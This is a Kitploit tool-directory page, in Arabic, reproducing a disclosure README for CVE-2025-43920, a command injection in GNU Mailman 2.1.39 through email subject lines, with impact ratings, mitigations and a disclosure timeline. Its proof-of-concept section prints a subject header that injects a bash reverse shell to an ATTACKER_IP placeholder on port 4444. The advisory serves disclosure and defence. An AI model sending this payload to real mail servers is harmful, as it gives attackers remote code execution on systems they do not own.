Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-43920 — إثبات مفهوم لاستغلال CVE-2025-43920، ثغرة حقن أوامر في GNU Mailman 2.1.39 عبر سطور موضوع البريد الإلكتروني، مما يتيح تنفيذ تعليمات برمجية عن بعد والوصول إلى شل عكسي. | Kitploit
أدوات/GitHubGitHub/0nyx-my7h/cve-2025-43920
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأمان البريد الإلكتروني
GitHub0nyx-my7h/cve-2025-43920

CVE-2025-43920

إثبات مفهوم لاستغلال CVE-2025-43920، ثغرة حقن أوامر في GNU Mailman 2.1.39 عبر سطور موضوع البريد الإلكتروني، مما يتيح تنفيذ تعليمات برمجية عن بعد والوصول إلى شل عكسي.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-43920: حقن أوامر عبر موضوع البريد الإلكتروني في GNU Mailman 2.1.39 (حزمة cPanel/WHM)

اكتشف بواسطة: فيرودين داودزاده وموسازادة أيدان
تاريخ الإفصاح: أبريل 2025
CVE ID: CVE-2025-43920
الخطورة: 5.4 متوسط (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)
نوع الهجوم: عن بُعد
البرنامج المتأثر: GNU Mailman 2.1.39 (مضمن مع cPanel/WHM)

نظرة عامة

GNU Mailman 2.1.39، كما هو مضمن مع cPanel و WHM، عرضة لثغرة خطيرة في حقن الأوامر تسمح للمهاجمين غير المصادق عليهم بتنفيذ أوامر عشوائية لنظام التشغيل. تحدث الثغرة عندما يتم تكوين أرشيف خارجي باستخدام PUBLIC_EXTERNAL_ARCHIVER أو PRIVATE_EXTERNAL_ARCHIVER في ملف التكوين mm_cfg.py، ويحتوي سطر موضوع البريد الإلكتروني على أحرف وصفية للصدفة (shell metacharacters) لم يتم تنظيفها بشكل صحيح. يمكن أن يؤدي ذلك إلى اختراق كامل للنظام، مما يمكّن المهاجمين من إنشاء قذائف عكسية (reverse shells)، أو تسريب البيانات، أو تنفيذ إجراءات ضارة أخرى.

تفاصيل الثغرة

  • نوع الثغرة: حقن الأوامر
  • البائع: GNU Mailman (GNU Mailman)
  • الإصدارات المتأثرة: Mailman 2.1.39؛ من المحتمل أن تؤثر على الإصدارات الأقدم 2.1.x (بانتظار اختبار الانحدار)
  • المكونات المتأثرة:
    • تكوين الأرشيف الخارجي (PUBLIC_EXTERNAL_ARCHIVER، PRIVATE_EXTERNAL_ARCHIVER)
    • Mailman/Handlers/ (منطق معالجة موضوع البريد الإلكتروني، قد يشمل ملفات مثل CookHeaders.py)
  • السبب الجذري: عند تكوين أرشيف خارجي، قد يتم تمرير سطر موضوع البريد الإلكتروني إلى أمر shell دون تنظيف مناسب، مما يسمح بتنفيذ أوامر عشوائية إذا كانت الأحرف الوصفية للصدفة (مثل ;، &، |) موجودة.
  • الحالة: لا يوجد إصلاح رسمي متاح. Mailman 2.1.x في نهاية العمر (EOL)؛ يوصى بشدة بالترحيل إلى Mailman 3.x.

إثبات المفهوم

لاستغلال هذه الثغرة، يمكن للمهاجم إرسال بريد إلكتروني إلى قائمة يديرها Mailman مع سطر موضوع ضار، مثل:

root@kitploit:~
Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

المتطلبات الأساسية:

  • يجب أن تحتوي قائمة Mailman المستهدفة على أرشيف خارجي تم تكوينه عبر PUBLIC_EXTERNAL_ARCHIVER أو PRIVATE_EXTERNAL_ARCHIVER.
  • يجب أن يتحكم المهاجم في خادم بريد أو عميل قادر على الإرسال إلى القائمة المستهدفة.
  • يجب إعداد مستمع (مثل netcat) على ATTACKERIP:4444 لاستقبال القشرة العكسية.

النتيجة المتوقعة: إذا لم يقم أمر الأرشيف الخارجي بتنظيف سطر الموضوع، فسيتم تنفيذ الأمر الضار على الخادم، مما يؤدي إلى إنشاء قشرة عكسية لخادم المهاجم.

نواقل الهجوم

  • الناقل الأساسي: سطور موضوع البريد الإلكتروني الضارة التي تحتوي على أحرف وصفية للصدفة مرسلة إلى قائمة بريدية يديرها Mailman مع أرشيف خارجي مهيأ.
  • سيناريوهات الاستغلال:
    • إنشاء قذائف عكسية للوصول المستمر.
    • تنفيذ أوامر لتسريب البيانات، أو تعديل التكوينات، أو تثبيت برامج ضارة.
    • التسلسل مع ثغرات أخرى لتصعيد الهجمات.
  • سهولة الاستغلال: عالية، حيث يمكن لأي مرسل بريد إلكتروني استهداف القوائم العامة أو غير المهيأة بشكل صحيح مع إعداد أرشيف خارجي.

التأثير الأمني

  • تنفيذ الأكواد: عالي (تنفيذ أوامر عشوائية لنظام التشغيل).
  • تصعيد الامتيازات: عالي (احتمال الوصول إلى الجذر (root) اعتمادًا على امتيازات تشغيل Mailman).
  • كشف المعلومات: عالي (يمكن أن يكشف مخرجات الأوامر عن بيانات النظام).
  • حرمان الخدمة: عالي (يمكن للأوامر الضارة تعطيل الخادم أو تحميله بشكل زائد).

التخفيفات

إجراءات فورية

  • تعطيل الأرشفة الخارجية: قم بتعيين PUBLIC_EXTERNAL_ARCHIVER و PRIVATE_EXTERNAL_ARCHIVER إلى None في mm_cfg.py لتعطيل وظيفة الأرشفة الخارجية:

    root@kitploit:~
    PUBLIC_EXTERNAL_ARCHIVER = None
    PRIVATE_EXTERNAL_ARCHIVER = None
    
  • تنظيف المدخلات: إذا كان الأرشيف الخارجي مطلوبًا، تأكد من أن الأمر ينظف سطر الموضوع لمنع حقن الأحرف الوصفية للصدفة.

  • تقييد الاشتراكات: حدد اشتراكات القوائم البريدية للمستخدمين الموثوقين لتقليل التعرض.

حلول طويلة الأجل

  • الترقية إلى Mailman 3.x: قم بالترحيل إلى Mailman 3.x، الذي ينفذ تنظيفًا قويًا للمدخلات ويتم صيانته بنشاط.
  • تعطيل معالجة البريد الإلكتروني: إذا لم تكن مطلوبة، قم بتعطيل وظيفة معالجة البريد الإلكتروني في Mailman للقضاء على ناقل الهجوم.
  • تعزيز البيئة: قم بتشغيل Mailman في بيئة محصورة (containerized) بأقل الامتيازات للحد من تأثير الاستغلالات المحتملة.

الجدول الزمني

  • الربع الأول 2025: اكتُشفت خلال تقييم اختبار اختراق مصرح به.
  • الربع الأول 2025: أُبلغ بها لمطوري GNU Mailman و cPanel.
  • أبريل 2025: تم تعيين CVE من قبل MITRE.
  • أبريل 2025: الإفصاح العلني عبر هذا المستودع.

المراجع

  • كود مصدر Mailman 2.1
  • سجل CVE-2025-43920
  • توصيات أمان Mailman
  • INCIBE-CERT - CVE-2025-43920
  • VULDB - CVE-2025-43920
  • المعهد الوطني للمعايير والتقنية (NIST) - CVE-2025-43920
  • Tenable - CVE-2025-43920

شكر وتقدير

قام فيرودين داودزاده وموسازادة أيدان بالإفصاح المسؤول عن هذه الثغرة أثناء اختبار اختراق مصرح به. شكر لفريق MITRE CVE على التنسيق.

الاتصال

البريد الإلكتروني: [email protected]\

تنزيل الأداة